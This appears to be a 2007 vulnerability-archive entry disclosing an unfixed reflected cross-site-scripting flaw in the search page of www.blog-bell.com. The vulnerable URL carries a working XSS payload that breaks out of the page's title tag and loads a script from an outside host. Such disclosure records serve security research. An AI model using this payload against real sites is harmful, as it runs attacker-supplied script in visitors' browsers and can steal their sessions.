Unfixed XSS vulnerability at www.blog-bell.com

ID XSSED:19643
Type xssed
Reporter kusomiso.com
Modified 2007-09-27T00:00:00


Security researcher kusomiso.com, has submitted on 26/09/2007 a cross-site-scripting (XSS) vulnerability affecting www.blog-bell.com, which at the time of submission ranked 1878055 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 27/09/2007. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail.

Vulnerable URL: http://www.blog-bell.com/s.php?word=%3C/title%3E'%3E%22%3E%3CSCRIPT/SRC=http://kusomiso.com/xss.js%3E%3C/SCRIPT%3E&rows=20&category=all&submit=%8C%9F%8D%F5